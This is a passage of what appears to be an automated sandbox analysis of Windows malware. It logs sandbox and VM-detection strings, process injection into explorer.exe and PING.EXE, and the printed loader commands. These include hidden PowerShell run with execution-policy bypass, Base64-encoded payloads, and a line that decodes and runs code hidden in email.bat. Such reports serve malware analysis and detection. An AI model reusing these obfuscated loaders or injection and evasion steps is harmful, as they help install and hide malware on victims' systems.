              Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\SysWOW64\PING.EXE WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXE WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 33000
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 32875
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 32759
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 32648
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 32532
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 32419
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 32308
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 32193
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 31954
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 31736
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 31620
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 39000
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 38874
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 38765
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 38650
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 38531
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 38421
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 38310
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 38203
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 38093
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37984
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37865
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37734
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37625
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37515
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37406
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37292
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37171
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 37053
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36927
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36796
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36687
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36574
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36466
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36353
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36247
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36125
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 36015
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 35902
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 35781
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 35671
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 35553
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 35420
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 35279
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 35125
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 34980
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 34871
              Source: C:\Windows\SysWOW64\PING.EXE Thread delayed: delay time: 34750
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34599Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34470Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34347Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34218Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34069Jump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33940Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35000
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34891
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34766
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34654
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34532
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34422
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34310
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34197
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34079
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33967
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33844
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33734
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33623
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33500
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33313
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 37000
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36890
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36769
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36641
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36531
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36422
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36312
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36203
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 36083
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35953
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35844
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35734
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35625
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35508
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35375
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35233
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35124
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 35015
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34655
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34545
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34437
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34328
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34218
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 34109
              Source: C:\Windows\SysWOW64\PING.EXEThread delayed: delay time: 33994
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^qSD:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exe10779
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2927964458.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
              Source: explorer.exe, 00000006.00000000.1732168635.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware.Workstation.vmui7769
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005EC5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|turn windows features on or off*|hyper-v:wux:hyper-v4937
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vm ware8394
              Source: explorer.exe, 00000006.00000000.1732168635.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
              Source: explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
              Source: explorer.exe, 00000006.00000002.2927964458.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: @\^qP\Moonchild Productions\Basilisk\PrlFS
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: model0Microsoft|VMWare|Virtual
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^qKD:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|vmware workstation 12 player*|vmpl5459
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|*|vmware6886
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|vm4595
              Source: explorer.exe, 00000006.00000000.1731694645.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vmare7220
              Source: explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware.Horizon.Client8097
              Source: explorer.exe, 00000006.00000000.1732168635.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|vmware workstation 15 player*|vmplayer6438
              Source: explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|*|qemu10642
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^q3microsoft-hyper-v-drivers-migration-replacement.man
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|hyperv4178
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|virtual5441
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware.Workstation.vmplayer8211
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware.View.Client12451
              Source: PING.EXE, 0000000A.00000002.2192781246.0000000003130000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe8601
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe12004
              Source: explorer.exe, 00000006.00000002.2927964458.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
              Source: explorer.exe, 00000006.00000002.2927964458.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
              Source: explorer.exe, 00000006.00000000.1732168635.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|vmware vsphere client*|vspe6388
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App11496
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|vdi3894
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|hyper v4919
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe12207
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|vmware horizon client*|view5503
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^qRD:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^q2microsoft-hyper-v-client-migration-replacement.man
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: *|vmware vsphere client*|vcenter5038
              Source: explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^q+microsoft-hyper-v-migration-replacement.man
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\PING.EXE | Process token adjusted: Debug
              Source: C:\Windows\explorer.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_2908.amsi.csv, type: OTHER
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 11B0000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\System32\taskkill.exe EIP: 3120000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\SysWOW64\PING.EXE EIP: 28E0000
              Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $KiULuf='OBqXlPGVGlv';poWerSHell -EXec BYPass -FIle "C:\Users\jones\AppData\Local\Phantom.ps1";$SAUYvmiirIZ='aKOSvBjKvvK'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 2580 base: 11B0000 value: E8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 11B0000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\PING.EXE base: 3120000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\PING.EXE base: 28E0000
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23DA.tmp" "c:\Users\user\AppData\Local\Temp\fhrgxrvn\CSCCE48297965FB4312A543AE9B3ACACFC0.TMP"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES50A7.tmp" "c:\Users\user\AppData\Local\Temp\CSC45E487DD8415477BBDD6263064315E51.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w h -e jablagkavqbmahuazga9accatwbcaheawabsafaarwbwaecabab2accaowbwag8avwblahiauwbiaguababsacaalqbfafgazqbjacaaqgbzafaayqbzahmaiaataeyasqbsaguaiaaiaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabqaggayqbuahqabwbtac4acabzadeaiga7acqauwbbafuawqb2ag0aaqbpahiasqbaad0ajwbhaesatwbtahyaqgbqaesadgb2aesajwa=
              Source: explorer.exe, 00000006.00000000.1731694645.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730039902.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2923579047.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000006.00000000.1729081607.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2921051040.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
              Source: explorer.exe, 00000006.00000002.2920165193.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
              Source: explorer.exe, 00000006.00000000.1729081607.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2921051040.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
              Source: explorer.exe, 00000006.00000000.1729081607.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2921051040.00000000018A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXE | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXE | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXE | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
              Source: C:\Windows\SysWOW64\PING.EXE | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
